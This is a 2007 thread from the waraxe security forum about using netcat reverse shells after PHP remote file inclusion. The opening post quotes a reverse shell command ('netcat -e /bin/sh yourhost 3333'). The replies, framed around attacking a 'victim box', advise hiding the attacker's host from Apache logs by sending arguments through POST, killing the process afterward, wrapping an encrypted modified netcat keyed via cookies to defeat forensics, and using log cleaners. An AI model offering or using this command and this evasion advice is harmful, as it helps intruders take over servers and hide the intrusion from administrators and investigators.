Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 590
Members: 0
Total: 590
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Remote file inclusion -> reverse shell tradeoff
Post new topic  Reply to topic View previous topic :: View next topic 
reverse shell tradeoff
PostPosted: Tue Jun 05, 2007 7:28 pm Reply with quote
drag
Active user
Active user
 
Joined: May 31, 2007
Posts: 25




I was doing some reading on old posts and noticed multiple threads that suggest using a reverse shell with netcat. Although this seems quite useful (using the php shell sucks in some ways compared to a real one, and to bypass logs), it seems to me that there is a tradeoff. Using the reverse shell opens by using:

netcat -e /bin/sh yourhost 3333

necessitates you placing your source address into a running process. I'd imagine that this is more noticeable than having it within the logs (depending on the admin). Am I missing something that would make this more stealthy? Any comments?
View user's profile Send private message
PostPosted: Fri Jun 08, 2007 1:29 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




the idea is, by using a reverse shell u would able to execute a shell rather than put some shell backdoor on victim (because a rule at victims firewall), you know sometimes you need to execute some command on victim box.

I agree, your ip will be logged, but do you think your connection (accessing the web for some php remote file inclusion) arent log either ?

so, u need some "covering track" mechanism, old time ago there was a
remove.c" , i think u can find a toushand or u can made one,

or, u could find some machine in some "other place" to receive your "reverse shell"

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
Re: reverse shell tradeoff
PostPosted: Fri Jun 08, 2007 10:23 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




drag wrote:
I was doing some reading on old posts and noticed multiple threads that suggest using a reverse shell with netcat. Although this seems quite useful (using the php shell sucks in some ways compared to a real one, and to bypass logs), it seems to me that there is a tradeoff. Using the reverse shell opens by using:

netcat -e /bin/sh yourhost 3333

necessitates you placing your source address into a running process. I'd imagine that this is more noticeable than having it within the logs (depending on the admin). Am I missing something that would make this more stealthy? Any comments?


First: if we want to "execute" netcat from php's exec() or system(), then by using POST method for delivering commandline arguments for netcat we can probably evade logging host and port to apache logs.

Second: after shell using netcat process must be killed. So no evidence stays.

Still I have vision for more paranoid uses:

Let's assume, that netcat is encrypted and wrapped to external file, which will receive encryption key from $_POST or $_COOKIE vector and then will unpack payload, containing netcat. And netcat itself is modified version, which has all needed information inside, so it does not need any command line parameters.

If somehow that encrypted file stays to hdd (if attacker for some reason forgets to delete traces), then it is practically impossible to decrypt it, because the key is unknown and can't be found from Apache logs.

Conclusion - best tools are manually modified and improved opensource tools Wink
View user's profile Send private message Send e-mail Visit poster's website
Re: reverse shell tradeoff
PostPosted: Sun Jun 10, 2007 2:52 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




waraxe wrote:

First: if we want to "execute" netcat from php's exec() or system(), then by using POST method for delivering commandline arguments for netcat we can probably evade logging host and port to apache logs.

Second: after shell using netcat process must be killed. So no evidence stays.

Still I have vision for more paranoid uses:

Let's assume, that netcat is encrypted and wrapped to external file, which will receive encryption key from $_POST or $_COOKIE vector and then will unpack payload, containing netcat. And netcat itself is modified version, which has all needed information inside, so it does not need any command line parameters.

If somehow that encrypted file stays to hdd (if attacker for some reason forgets to delete traces), then it is practically impossible to decrypt it, because the key is unknown and can't be found from Apache logs.

Conclusion - best tools are manually modified and improved opensource tools Wink


CMIIW, So i think waraxe try to say "made your own tools for e.g your own netcat" Smile, its an unusual ways so its hard to trace (by IDS, IPS, rkhunter tools and other dig forensic tools because it wouldnt be in there database/pattern).

but as far as i know, being anonymous is not "always" without a log, i rather fake it or use another "character"

SOL

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
reverse shell tradeoff
  www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.121 Seconds